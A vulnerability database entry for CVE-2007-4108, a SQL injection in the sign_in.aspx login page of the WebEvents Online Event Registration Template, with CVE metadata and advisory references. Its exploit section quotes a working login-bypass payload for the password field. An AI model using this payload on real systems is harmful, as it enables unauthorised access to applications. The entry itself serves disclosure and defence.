Online Event Registration Template Sign_In.ASPX SQL Injection Vulnerability

Vulnerability ID 1189611 Vulnerability type SQL injection
Published 2007-07-31 Updated 2007-08-01
CVE ID CVE-2007-4108 CNNVD-ID CNNVD-200707-562
Affected platform N/A CVSS score 7.5
|Vulnerability source
https://cxsecurity.com/issue/WLB-2007080015
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200707-562
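|Vulnerability details
A SQL injection vulnerability exists in sign_in.aspx of WebEvents (Online Event Registration Template). A remote attacker can execute arbitrary SQL commands via the Password parameter.
|Exploit (EXP)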
__________________________

A R I A - S E C U R I T Y
_________________________

WebEvents: Online Event Registration Template Username Field SQL Injection
Vendor: http://www.codewidgets.com

http://target.com/PATH/sign_in.aspx

Username: admin
Password: anything' OR 'x'='x

Credits: Aria-Security Team
http://aria-security.net
http://outlaw.aria-security.info
|References

Source: BID
Name: 25111
Link: http://www.securityfocus.com/bid/25111
Source: BUGTRAQ
Name: 20070727 WebEvents: Online Event Registration Template Username Fields SQL INJECTION
Link: http://www.securityfocus.com/archive/1/archive/1/474933/100/0/threaded
Source: BUGTRAQ
Name: 20070728 WebEvents: Online Event Registration Template Username Fields SQL INJECTION
Link: http://www.securityfocus.com/archive/1/archive/1/474931/100/0/threaded
Source: SECUNIA
Name: 26252
Link: http://secunia.com/advisories/26252
Source: MISC
Link: http://outlaw.aria-security.info/?p=10
Source: XF
Name: webevents-signin-sql-injection(35671)
Link: http://xforce.iss.net/xforce/xfdb/35671
Source: SREASON
Name: 2948
Link: http://securityreason.com/securityalert/2948